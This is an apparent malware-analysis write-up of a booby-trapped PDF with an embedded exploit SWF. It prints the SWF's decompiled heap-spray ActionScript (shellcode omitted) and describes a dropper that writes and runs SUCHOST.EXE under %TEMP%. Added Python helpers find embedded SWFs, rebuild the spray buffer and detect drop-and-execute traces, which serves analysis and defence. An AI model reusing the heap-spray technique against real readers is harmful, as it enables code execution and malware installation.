This is a PDF version 1.7 document; its signature is visible in the header:
%PDF-1.7
%忏嫌
(The second line is the conventional comment of four or more non-ASCII bytes that marks the file as binary; here those bytes show up as mis-decoded characters.)

At obj 10 there is a SWF: the FWS file header is plainly visible, but this SWF is harmless. It probably builds a malformed structure so that the reader's parser goes wrong. (decimal offset: 4146)
Immediately after it, obj 11 is another SWF, and this one is the malicious one. (decimal offset: 4146+1315)
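Locating embedded SWFs the way the analysis above does (walk the `N G obj` records and check each raw stream for the FWS/CWS/ZWS signature and its header length) can be automated. The Python below is an added example and not code from the original write-up; the PDF it scans is a small constructed sample in which obj 10 deliberately carries a SWF header whose declared length disagrees with the stream, standing in for the malformed first SWF, and obj 11 a consistent one. It only finds SWFs stored uncompressed inside the PDF, which is the case here since the FWS header was visible at a raw file offset; a FlateDecode'd stream would have to be inflated first.

```python
import re
import struct
import sys

SWF_MAGICS = {b"FWS": "uncompressed", b"CWS": "zlib", b"ZWS": "lzma"}
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b")
STREAM_RE = re.compile(rb"stream\r?\n")


def make_swf(version, body, declared_len=None):
    """Build a minimal SWF (constructed test data): magic, version byte, LE32 file length, body."""
    length = len(body) + 8 if declared_len is None else declared_len
    return b"FWS" + bytes([version]) + struct.pack("<I", length) + body


# Constructed sample, not the PDF from the analysis: obj 10's SWF declares 4096 bytes but
# the stream holds 16 (a malformed header), obj 11's SWF is consistent.
SAMPLE_PDF = (
    b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n"
    + b"1 0 obj\n<< /Type /Catalog >>\nendobj\n"
    + b"10 0 obj\n<< /Length 16 >>\nstream\n" + make_swf(10, b"\x00" * 8, declared_len=4096)
    + b"\nendstream\nendobj\n"
    + b"11 0 obj\n<< /Length 16 >>\nstream\n" + make_swf(10, b"\x00" * 8)
    + b"\nendstream\nendobj\n"
    + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
)


def pdf_version(data):
    m = re.match(rb"%PDF-(\d\.\d)", data)
    return m.group(1).decode() if m else None


def iter_objects(data):
    """Yield (num, gen, obj_offset, body_offset, end_offset) for every 'N G obj ... endobj'."""
    for m in OBJ_RE.finditer(data):
        end = data.find(b"endobj", m.end())
        yield int(m.group(1)), int(m.group(2)), m.start(), m.end(), (len(data) if end < 0 else end)


def find_embedded_swfs(data):
    """Report every object whose raw stream begins with a SWF signature."""
    hits = []
    for num, gen, obj_off, body_off, end in iter_objects(data):
        sm = STREAM_RE.search(data, body_off, end)
        es = data.find(b"endstream", body_off, end)
        if sm is None or es < 0:
            continue
        start = sm.end()                      # absolute file offset of the stream data
        magic = data[start:start + 3]
        if magic not in SWF_MAGICS or start + 8 > es:
            continue
        stream_len = es - start
        # the EOL preceding 'endstream' is not part of the stream data
        if data[start:es].endswith(b"\r\n"):
            stream_len -= 2
        elif data[start:es].endswith(b"\n"):
            stream_len -= 1
        declared = struct.unpack_from("<I", data, start + 4)[0]
        hits.append({
            "obj": num, "gen": gen, "obj_offset": obj_off, "swf_offset": start,
            "compression": SWF_MAGICS[magic], "version": data[start + 3],
            "declared_len": declared, "stream_len": stream_len,
            # for an uncompressed SWF the header length is the whole file length;
            # for CWS/ZWS it is the uncompressed size, so only FWS is compared
            "length_mismatch": magic == b"FWS" and declared != stream_len,
        })
    return hits


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PDF
    print("PDF version:", pdf_version(data))
    for h in find_embedded_swfs(data):
        print(h)
```

A real sample may also hide the SWF behind a `/Filter /FlateDecode` stream or split it across objects; in that case decode the stream first and run the same signature check on the decoded bytes.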
The SWF contains two frames; the ActionScript shows that the malicious code runs as soon as the first frame is loaded:

package save_fla
{
    import flash.display.*;
    import flash.utils.*;

    dynamic public class MainTimeline extends MovieClip
    {
        public var byteArr:ByteArray;
        public var b:Object;
        public var a:Object;

        public function MainTimeline()
        {
            addFrameScript(0, frame1);   // frame1() runs when frame 0 (the first frame) is entered
            return;
        }// end function

        function frame1()
        {
            b = "\f\f\f\f";              // four 0x0C bytes
            a = "\x13\x13\x13\x13"; 
            while (b.length < 1048576)   // grow b four bytes at a time until it is 1 MiB (spray filler)
            {
                // label
                b = b + a;
            }// end while
            byteArr = new ByteArray();
            byteArr.writeByte(64);
            byteArr.writeByte(64);
            byteArr.writeByte(64);
            byteArr.writeByte(64);
            while (byteArr.length < 1048576 * 64)  // 64 copies of b: a 64 MiB spray buffer
            {
                // label
                byteArr.writeMultiByte(b, "iso-8859-1");   // one byte per character, so b is copied as raw bytes
            }// end while
            byteArr.writeByte(144);  // 0x90 0x90: start of the actual shellcode
            byteArr.writeByte(144);
            //…………………………………………………………omitted
            byteArr.writeByte(107);  // last three bytes: 0x6b 0x61 0x6b
            byteArr.writeByte(97);
            byteArr.writeByte(107);
            return;
        }// end function

    }
}
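The two loops in frame1() are a heap spray: a 1 MiB filler string is copied 64 times into a ByteArray and the shellcode is appended at the end. As an added example, not part of the original sample or write-up, the Python below reproduces that buffer layout from the constants in the decompiled code, computes the same layout by arithmetic so the 64 MiB case can be checked without allocating it, and shows how to find the shellcode tail in a dump of such a buffer. The shellcode itself is a constructed stand-in: only its leading 0x90 0x90 and trailing 0x6b 0x61 0x6b match what the page shows.

```python
import collections
import struct

# Constants taken from frame1(); everything else here is an added reconstruction.
CHUNK_LEN = 1048576            # b.length target
SPRAY_LEN = 1048576 * 64       # byteArr.length target
PREFIX = b"\x0c\x0c\x0c\x0c"   # initial b: "\f\f\f\f"
PAD = b"\x13\x13\x13\x13"      # a, appended until b reaches CHUNK_LEN
HEAD = b"\x40" * 4             # the four writeByte(64) calls
# Constructed stand-in for the shellcode: the 0xCC filler is not the real payload.
FAKE_SHELLCODE = b"\x90\x90" + b"\xcc" * 13 + b"\x6b\x61\x6b"


def build_filler(chunk_len=CHUNK_LEN):
    """Mirror the first loop: grow b by four bytes per pass until it is at least chunk_len."""
    b = bytearray(PREFIX)
    while len(b) < chunk_len:
        b.extend(PAD)
    return bytes(b)


def build_spray(shellcode=FAKE_SHELLCODE, chunk_len=CHUNK_LEN, spray_len=SPRAY_LEN):
    """Mirror the second loop: writeMultiByte(b, "iso-8859-1") appends b byte-for-byte."""
    filler = build_filler(chunk_len)
    buf = bytearray(HEAD)
    while len(buf) < spray_len:
        buf.extend(filler)
    buf.extend(shellcode)          # the writeByte(144) ... tail
    return bytes(buf)


def expected_layout(chunk_len=CHUNK_LEN, spray_len=SPRAY_LEN):
    """Same layout by arithmetic (ceiling divisions mirror the 'while length <' loops)."""
    passes = -(-(chunk_len - len(PREFIX)) // len(PAD))
    filler_len = len(PREFIX) + passes * len(PAD)
    chunks = -(-(spray_len - len(HEAD)) // filler_len)
    return {"filler_len": filler_len, "chunks": chunks,
            "shellcode_offset": len(HEAD) + chunks * filler_len}


def locate_shellcode(buf, chunk_len=CHUNK_LEN):
    """Skip the head and every full filler chunk in a dumped buffer; return (chunks, offset)."""
    filler = build_filler(chunk_len)
    pos, chunks = len(HEAD), 0
    while buf[pos:pos + len(filler)] == filler:
        pos += len(filler)
        chunks += 1
    return chunks, pos


def dominant_dword(buf):
    """Most common aligned little-endian dword: what a pointer read from the spray resolves to."""
    n = len(buf) - len(buf) % 4
    counts = collections.Counter(v for (v,) in struct.iter_unpack("<I", buf[:n]))
    return counts.most_common(1)[0][0]


if __name__ == "__main__":
    layout = expected_layout()
    buf = build_spray()            # allocates the full 64 MiB buffer plus the stand-in shellcode
    assert locate_shellcode(buf) == (layout["chunks"], layout["shellcode_offset"])
    print(layout, hex(dominant_dword(buf[:4 * 1024 * 1024])))
```

With the real constants b is exactly 1 MiB (262143 passes of four bytes after the four leading 0x0C), byteArr receives 64 copies of it, and the shellcode begins at offset 4 + 64 * 1048576 = 67108868. Every aligned dword in the sprayed region is 0x13131313 except the 0x0C0C0C0C at the head of each 1 MiB chunk, so a dword read from almost anywhere in the spray yields 0x13131313.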


The shellcode carved out of the ByteArray yields the following data (hex):

After building the shellcode into an exe and stepping through it in OllyDbg:
The code first loads a batch of function addresses, then calls GetCommandLineA to get its command line and CreateFileA to open its own file; if that fails it calls GetFileSize, and if the file exists it ends the process with TerminateProcess. On success it calls GetTempPathA, then CreateFileA to create %TEMP%\SUCHOST.EXE, writes some junk data into it and runs it with WinExec; then CreateFileA to create %TEMP%\temp.EXE, likewise run with WinExec; finally it terminates itself with TerminateProcess.
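The call sequence above is a textbook drop-and-execute: write a file under %TEMP%, launch it with WinExec, repeat, then exit. As an added example, not part of the original analysis, the Python below runs that detection over a constructed API trace in a simplified "Api(args) -> ret" format; the trace is not OllyDbg output and its paths and handle values are invented. It also flags the sample opening its own image, the self-check seen at the start of the trace.

```python
import re

# Constructed API trace mirroring the dropper behaviour described above; not real tool output.
SAMPLE_TRACE = [
    'GetCommandLineA() -> "C:\\samples\\dropper.exe"',
    'CreateFileA("C:\\samples\\dropper.exe", GENERIC_READ, OPEN_EXISTING) -> 0x58',
    'GetFileSize(0x58, NULL) -> 0x2c00',
    'GetTempPathA(260, 0x0012f8c4) -> "C:\\Windows\\Temp\\"',
    'CreateFileA("C:\\Windows\\Temp\\SUCHOST.EXE", GENERIC_WRITE, CREATE_ALWAYS) -> 0x5c',
    'WriteFile(0x5c, 0x00403000, 0x1000) -> 1',
    'WinExec("C:\\Windows\\Temp\\SUCHOST.EXE", SW_HIDE) -> 33',
    'CreateFileA("C:\\Windows\\Temp\\temp.EXE", GENERIC_WRITE, CREATE_ALWAYS) -> 0x60',
    'WriteFile(0x60, 0x00404000, 0x0800) -> 1',
    'WinExec("C:\\Windows\\Temp\\temp.EXE", SW_HIDE) -> 33',
    'TerminateProcess(0xffffffff, 0) -> 1',
]

LINE_RE = re.compile(r"^(\w+)\((.*)\)\s*->\s*(.*)$")


def parse_call(line):
    """Split 'Api(a, b) -> ret' into (api, [args], ret); None for lines that do not fit."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    api, raw_args, ret = m.groups()
    args = [a.strip() for a in raw_args.split(",")] if raw_args.strip() else []
    return api, args, ret.strip()


def unquote(s):
    return s[1:-1] if len(s) >= 2 and s[0] == s[-1] == '"' else s


def classify_trace(lines):
    """Return (line_no, kind, path) findings: the sample opening its own image, and any file
    it creates for writing under the temp directory and then launches (drop-and-execute)."""
    self_path = None
    temp_dirs = set()
    created_in_temp = set()
    findings = []
    for line_no, line in enumerate(lines, 1):
        parsed = parse_call(line)
        if parsed is None:
            continue
        api, args, ret = parsed
        if api == "GetCommandLineA":
            self_path = unquote(ret).lower()       # assumes a bare image path with no extra arguments
        elif api == "GetTempPathA":
            temp_dirs.add(unquote(ret).lower())
        elif api == "CreateFileA" and args:
            path = unquote(args[0])
            if path.lower() == self_path:
                findings.append((line_no, "self-open", path))
            if "GENERIC_WRITE" in args and any(path.lower().startswith(d) for d in temp_dirs):
                created_in_temp.add(path.lower())
        elif api in ("WinExec", "CreateProcessA") and args:
            path = unquote(args[0])
            if path.lower() in created_in_temp:
                findings.append((line_no, "drop-and-exec", path))
    return findings


if __name__ == "__main__":
    for finding in classify_trace(SAMPLE_TRACE):
        print(finding)
```

The same logic ports directly to a real API-monitor or sandbox log once the line parser is adapted to that tool's format; the signal to keep is the pairing of a write-mode CreateFileA under the temp directory with a later WinExec or CreateProcessA on the same path.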